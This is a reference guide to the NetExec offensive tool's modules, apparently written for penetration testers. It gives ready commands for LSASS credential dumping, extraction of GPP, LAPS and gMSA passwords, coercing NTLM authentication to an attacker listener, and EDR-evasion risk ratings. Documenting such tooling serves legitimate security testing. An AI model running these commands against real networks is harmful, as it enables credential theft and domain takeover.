# NetExec Modules Reference

## Overview

NetExec's modular architecture allows community-contributed attack modules to run against targets. Each module is protocol-specific and provides automated attack capabilities, from credential dumping to vulnerability scanning. This reference catalogs the key built-in modules with their protocol, purpose, OPSEC risk, and usage.

## Module Discovery

```bash
# List all available modules for a protocol
netexec smb -L
# Shows: module name, description, author

# List modules for other protocols
netexec ldap -L
netexec winrm -L
netexec mssql -L
netexec ssh -L

# Get detailed options for a specific module
netexec smb -M lsassy --options
# Shows: configurable parameters, default values, descriptions
```

## Module Usage Pattern

```bash
netexec <protocol> <target> -u <user> -p <pass> -M <module_name> [-o KEY=VALUE]
# -M <module> -> module name (case-sensitive)
# -o KEY=VALUE -> module options (comma-separated for multiple)
```

## SMB Modules

### lsassy — Remote LSASS Credential Dump

| Attribute | Value |
|---|---|
| Purpose | Remotely dump LSASS process memory and extract credentials |
| Privilege | Local Administrator |
| Noise | High (LSASS access, EDR trigger) |
| Output | Plaintext passwords, NTLM hashes, Kerberos tickets from LSASS |

```bash
netexec smb 10.10.10.5 -u admin -p pass -M lsassy
netexec smb 10.10.10.5 -u admin -p pass -M lsassy -o METHOD=2 # dumpert method
```

### spider_plus — Recursive Share Crawler

| Attribute | Value |
|---|---|
| Purpose | Recursively list and download files from accessible shares |
| Privilege | Any valid credential with share read access |
| Noise | Medium (high SMB file listing traffic) |
| Output | File listings, downloaded files matching patterns |

```bash
netexec smb 10.10.10.5 -u user -p pass -M spider_plus
netexec smb 10.10.10.5 -u user -p pass -M spider_plus -o PATTERN='*.kdbx,*.xml,*.config,*.ps1'
```

### scuffy — SMB Signing Check

| Attribute | Value |
|---|---|
| Purpose | Check SMB signing status (identify relay targets) |
| Privilege | None (unauthenticated) |
| Noise | Low (SMB negotiation) |
| Output | signing:True or signing:False per target |

```bash
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy
```

### wcc — WebClient (WebDAV) Check

| Attribute | Value |
|---|---|
| Purpose | Check if WebClient service is running (coercion prerequisite) |
| Privilege | None (unauthenticated) |
| Noise | Low |
| Output | WebClient:Running or WebClient:Stopped per target |

```bash
netexec smb 10.10.10.0/24 -u '' -p '' -M wcc
```

### bloodhound — BloodHound Collector (SMB)

| Attribute | Value |
|---|---|
| Purpose | Collect BloodHound data via SMB (requires SharpHound on target) |
| Privilege | Valid domain credentials |
| Noise | High (binary execution on target) |
| Output | BloodHound JSON files |

```bash
netexec smb 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='All'
```

### nanodump — LSASS Dump Variant

| Attribute | Value |
|---|---|
| Purpose | PowerShell-based LSASS dump (alternative to lsassy) |
| Privilege | Local Administrator |
| Noise | Medium (PowerShell execution) |
| Output | LSASS minidump |

```bash
netexec smb 10.10.10.5 -u admin -p pass -M nanodump
```

### handlekatz — Mimikatz via Handle Duplication

| Attribute | Value |
|---|---|
| Purpose | Execute Mimikatz using handle duplication (bypasses some EDR) |
| Privilege | Local Administrator |
| Noise | High |
| Output | LSASS credentials |

```bash
netexec smb 10.10.10.5 -u admin -p pass -M handlekatz
```

### nopac — CVE-2021-42278/42287 Check

| Attribute | Value |
|---|---|
| Purpose | Check for noPac vulnerability (samAccountName spoofing) |
| Privilege | Valid domain credentials |
| Noise | Medium (machine account creation) |
| Output | Vulnerable/Not Vulnerable |

```bash
netexec smb 10.10.10.5 -u user -p pass -M nopac
```

### petitpotam — Coerce Authentication

| Attribute | Value |
|---|---|
| Purpose | Coerce target to authenticate to attacker (EFSRPC method) |
| Privilege | None (unauthenticated) |
| Noise | Medium |
| Output | Incoming NTLM authentication to specified listener |

```bash
netexec smb 10.10.10.5 -u '' -p '' -M petitpotam -o LISTENER=10.10.14.5
```

### dfscoerce — DFS Coerce Authentication

| Attribute | Value |
|---|---|
| Purpose | Coerce authentication via DFS-RPC (NetrDfsRemoveStdRoot) |
| Privilege | None (unauthenticated) |
| Noise | Medium |
| Output | Incoming NTLM authentication |

```bash
netexec smb 10.10.10.5 -u '' -p '' -M dfscoerce -o LISTENER=10.10.14.5
```

### shadowcoerce — Shadow Copy Coerce

| Attribute | Value |
|---|---|
| Purpose | Coerce authentication via FSRVP (Shadow Copy RPC) |
| Privilege | Valid domain credentials |
| Noise | Medium |
| Output | Incoming NTLM authentication |

```bash
netexec smb 10.10.10.5 -u user -p pass -M shadowcoerce -o LISTENER=10.10.14.5
```

### zerologon — CVE-2020-1472 Check

| Attribute | Value |
|---|---|
| Purpose | Check for ZeroLogon vulnerability (Netlogon bypass) |
| Privilege | None (unauthenticated) |
| Noise | Low (single RPC call) |
| Output | Vulnerable/Patched |

```bash
netexec smb 10.10.10.5 -u '' -p '' -M zerologon
```

### gpp_password — Group Policy Preferences Password Extraction

| Attribute | Value |
|---|---|
| Purpose | Find and decrypt GPP passwords from SYSVOL shares |
| Privilege | Any authenticated domain user |
| Noise | Low (SMB file read) |
| Output | Plaintext passwords from GPP XML files |

```bash
netexec smb 10.10.10.5 -u user -p pass -M gpp_password
```

### gpp_autologin — GPP Auto-Logon Credentials

| Attribute | Value |
|---|---|
| Purpose | Extract auto-logon credentials from GPP |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Auto-logon username/password |

```bash
netexec smb 10.10.10.5 -u user -p pass -M gpp_autologin
```

### enum_av — Antivirus Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate installed AV/EDR products |
| Privilege | Valid credentials with WMI access |
| Noise | Low |
| Output | AV product name, version, status |

```bash
netexec smb 10.10.10.5 -u user -p pass -M enum_av
```

### enum_dns — DNS Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate DNS records via SMB/RPC |
| Privilege | Valid domain credentials |
| Noise | Low |
| Output | DNS zones, records |

```bash
netexec smb 10.10.10.5 -u user -p pass -M enum_dns
```

## LDAP Modules

### adcs — ADCS Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate ADCS infrastructure and vulnerable templates |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | CA servers, templates, ESC1–ESC15 vulnerability flags |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M adcs
```

### laps — LAPS Password Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate LAPS-managed computers and read passwords |
| Privilege | Domain user (read requires LAPS reader permission) |
| Noise | Low (LDAP reads) |
| Output | Computer list with LAPS status, passwords (if authorized) |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M laps
netexec ldap 10.10.10.5 -u laps_reader -p pass -M laps -o READ=true
```

### delegation — Delegation Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate all delegation types (unconstrained, constrained, RBCD) |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Computers/users with delegation configured, delegation type |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M delegation
```

### bloodhound — BloodHound Collector (LDAP)

| Attribute | Value |
|---|---|
| Purpose | Collect BloodHound data via LDAP (no on-target execution) |
| Privilege | Any authenticated domain user |
| Noise | Medium (high-volume LDAP queries) |
| Output | BloodHound-compatible JSON files |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='ACL,Group,Trusts'
```

### gmsa — gMSA Password Read

| Attribute | Value |
|---|---|
| Purpose | Read gMSA managed passwords |
| Privilege | Domain user with gMSA read permission |
| Noise | Low (LDAP read) |
| Output | gMSA account NTLM hash |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M gmsa
```

### maq — Machine Account Quota

| Attribute | Value |
|---|---|
| Purpose | Check Machine Account Quota (for RBCD attacks) |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP read) |
| Output | MAQ value (default: 10) |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M maq
```

### subnet — Subnet Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate AD Sites and Services subnets |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Subnet definitions, site associations |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M subnet
```

### trusts — Domain Trust Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate domain and forest trusts |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Trusted domains, trust direction, SID filtering status |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M trusts
```

### user-desc — User Description Password Search

| Attribute | Value |
|---|---|
| Purpose | Search user description fields for passwords |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Users with passwords in description field |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M user-desc
```

### get-desc-users — Get Users with Specific Description

| Attribute | Value |
|---|---|
| Purpose | Search for users by description keyword |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Users matching description filter |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M get-desc-users -o KEYWORD='admin'
```

### group-mem — Group Membership Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate members of specific groups |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Group members |

```bash
netexec ldap 10.10.10.5 -u user -p pass -M group-mem -o GROUP='Domain Admins'
```

## MSSQL Modules

### mssql_priv — Privilege Check

| Attribute | Value |
|---|---|
| Purpose | Check SQL user privilege level (sysadmin, db_owner, etc.) |
| Privilege | Valid SQL credentials |
| Noise | Low (SQL queries) |
| Output | sysadmin:True/False, db_owner roles |

```bash
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_priv
```

### mssql_linked_servers — Linked Server Enumeration

| Attribute | Value |
|---|---|
| Purpose | Enumerate linked SQL servers (trust relationships) |
| Privilege | Valid SQL credentials |
| Noise | Low (SQL queries) |
| Output | Linked server names, connection strings |

```bash
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_linked_servers
```

## RDP Modules

### rdp_screenshot — Screenshot Capture

| Attribute | Value |
|---|---|
| Purpose | Capture screenshot of active RDP session |
| Privilege | Valid RDP credentials |
| Noise | Medium (brief RDP connection) |
| Output | PNG screenshot |

```bash
netexec rdp 10.10.10.5 -u user -p pass -M rdp_screenshot
```

## VNC Modules

### vnc_screenshot — Screenshot Capture

| Attribute | Value |
|---|---|
| Purpose | Capture screenshot of VNC session |
| Privilege | Valid VNC password |
| Noise | Low |
| Output | PNG screenshot |

```bash
netexec vnc 10.10.10.5 -u '' -p pass -M vnc_screenshot
```

## SSH Modules

### sudo_check — Sudo Privilege Check

| Attribute | Value |
|---|---|
| Purpose | Check sudo privileges for authenticated user |
| Privilege | Valid SSH credentials |
| Noise | Low (single command execution) |
| Output | sudo -l output |

```bash
netexec ssh 10.10.10.5 -u user -p pass -M sudo_check
```

## Module Risk Matrix

| Module | Protocol | Privilege Required | Noise | EDR Risk |
|---|---|---|---|---|
| scuffy | SMB | None | Low | None |
| wcc | SMB | None | Low | None |
| zerologon | SMB | None | Low | None |
| petitpotam | SMB | None | Medium | Low |
| dfscoerce | SMB | None | Medium | Low |
| gpp_password | SMB | Domain User | Low | None |
| spider_plus | SMB | Domain User | Medium | Low |
| enum_av | SMB | Domain User | Low | Low |
| adcs | LDAP | Domain User | Low | None |
| laps | LDAP | Domain User | Low | None |
| delegation | LDAP | Domain User | Low | None |
| bloodhound | LDAP | Domain User | Medium | Low |
| maq | LDAP | Domain User | Low | None |
| user-desc | LDAP | Domain User | Low | None |
| mssql_priv | MSSQL | SQL Login | Low | None |
| sudo_check | SSH | SSH User | Low | None |
| rdp_screenshot | RDP | RDP User | Medium | Low |
| shadowcoerce | SMB | Domain User | Medium | Medium |
| nopac | SMB | Domain User | Medium | Medium |
| bloodhound | SMB | Domain User | High | High |
| lsassy | SMB | Local Admin | High | Very High |
| nanodump | SMB | Local Admin | Medium | High |
| handlekatz | SMB | Local Admin | High | Very High |

## Writing Custom Modules

NetExec modules are Python classes that inherit from a base module class. They receive the protocol connection context and can execute arbitrary operations.

```python
# Minimal module skeleton
from nxc.modules.base import BaseModule


class Module(BaseModule):
    name = "example"
    description = "Example custom module"
    supported_protocols = ["smb"]
    opsec_safe = True  # Low noise
    multiple_hosts = True  # Can run against multiple targets

    def options(self, context, module_options):
        """Define module options"""
        pass

    def on_login(self, context, connection):
        """Execute when valid credentials are provided"""
        pass

    def on_request(self, context, request):
        """Execute on every request (even without credentials)"""
        pass
```

Module files are placed in `~/.netexec/modules/` or the NetExec installation modules directory.

## Cross-References

- SMB Operations — SMB protocol usage
- LDAP Operations — LDAP protocol usage
- AD Attacks via NetExec — Modules in attack chains
- Credential Dumping — lsassy and related modules